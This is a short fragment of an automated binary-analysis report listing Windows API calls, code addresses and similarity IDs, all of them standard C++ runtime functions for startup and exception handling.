                            • API String ID: 2744216297-0
                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0030D9C7
                            • GetCurrentThreadId.KERNEL32 ref: 0030D9D6
                            • GetCurrentProcessId.KERNEL32 ref: 0030D9DF
                            • QueryPerformanceCounter.KERNEL32(?), ref: 0030D9EC
                            Similarity
                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                            • String ID:
                            • API String ID: 2933794660-0
                            APIs
                            • ___std_exception_copy.LIBVCRUNTIME ref: 0030243F
                              • Part of subcall function 0030E360: RaiseException.KERNEL32(E06D7363,00000001,00000003,003011AC,?,?,?,?,003011AC,?,0033D954), ref: 0030E3C1
                            Strings
                            Similarity
                            • API ID: ExceptionRaise___std_exception_copy
                            • String ID: ios_base::badbit set$ios_base::failbit set
                            • API String ID: 3109751735-1240500531
                            APIs
                            • EncodePointer.KERNEL32(00000000,?), ref: 003108BC
                            Strings
                            Similarity
                            • API ID: EncodePointer
                            • String ID: MOC$RCC
                            • API String ID: 2118026453-2084237596